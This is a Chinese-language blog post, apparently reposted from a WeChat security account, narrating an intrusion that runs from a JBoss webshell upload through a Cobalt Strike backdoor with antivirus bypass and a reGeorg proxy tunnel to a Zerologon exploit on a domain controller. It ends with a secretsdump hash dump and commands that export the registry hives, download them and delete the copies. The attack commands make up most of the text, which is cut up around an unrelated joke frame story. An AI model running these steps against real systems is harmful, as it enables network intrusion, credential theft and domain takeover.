老头说当年他爷爷被妖精抓走,于是他便怒气冲冲的去解救,上去便是一句:“妖精!还我爷爷!”没想到妖精和颜悦色的问了他一个问题,他一直苦苦思索,始终没有结果,说着便给我看了一张他珍藏多年的图片。
步骤一:获取网站权限
方法一:利用此工具上传上传webshell至网站根目录。
利用工具自带文件管理功能,找到文件web目录
C:BAGJBOSSjboss-4.2.3.GAserverdefaultdeployjmx-console.war
利用上传功能上传至指定目录。
利用现成的工具,参数-u后面加目标地址可以直接获得一个交互式shell
1.将shell.jsp文件压缩为zip文件,更改后缀为war文件
python -m SimpleHTTPServer 8000 #Python 2python -m http.server 8000 #Python 3
访问地址,可以看到服务开启成功
搜索关键字jboss.deployment
找到flavor=URL,type=DeploymentScanner点进去
4.使用冰蝎测试连接
步骤二:获取服务器权限
1.服务器运行CS服务端
./teamserver IP 密码
添加监听器
生成windows后门
attacks->packages->Windows Executable
利用CS插件bypassAV快速生成一个后门文件
步骤三:获取域控主机权限
MS14-068具体利用方法,可以参考链接地址:
MS14-068漏洞复现 https://blog.csdn.net/lhh134/article/details/104139081继续按照此思路对内网存活机器常见端口进行探测看是否存在ms17010漏洞或者弱口令的主机。
为方便后续测试,搭建一个代理。上传常见的几个代理软件(注意部分服务器可能会限制只允许80、443端口流量通过),发现被杀后决定使用reg,利用webshell将对应语言的版本上传到网站根目录。
本机运行如下命令,开启代理
$ python reGeorgSocksProxy.py -p 8080 -u http://目标网站/tunnel.jsp-u #指定脚本的连接地址
修改本地的proxychain的配置文件,kali下默认位置为/etc/proxychains.conf
proxychain curl ipinfo.io
过了N久以后,等我有时间的时候想起这个,刚好在这期间出现了新的域控漏洞,估摸着时间也出来没多久,对方不会这么快,于是再次尝试域提权漏洞,根据网上公开的利用方式
第一步,探测目标是否存在漏洞,发现存在漏洞
proxychains python3 zerologon_tester.py XXX013 10.0.19.13
proxychains python3 cve-2020-1472-exploit.py XXX013 10.0.19.13
proxychains python3 secretsdump.py xxx.local/XXX013$@10.0.19.13 -just-dc -no-pass
reg save HKLMSYSTEM system.save #利用注册表导出hash并保存为system.savereg save HKLMSAM sam.savereg save HKLMSECURITY security.saveget system.save #下载文件system.save到本地get sam.saveget security.savedel /f system.save #删除文 system.savedel /f sam.savedel /f security.save
python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
python3 reinstall_original_pw.py XXX013 10.0.19.13 5e80d11de2760cc86ec02b67a544e269
到此,域控获取结束。
1.获取网站权限-2.获取服务器权限-3.搭建内网代理-4.利用域控漏洞获取域控权限
抱着忐忑的心情我缓缓的点开了文件:
推 荐 阅 读
欢 迎 私 下 骚 扰
本文始发于微信公众号(潇湘信安):原创 | 牛红红的日记(平平无奇拿下域控)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论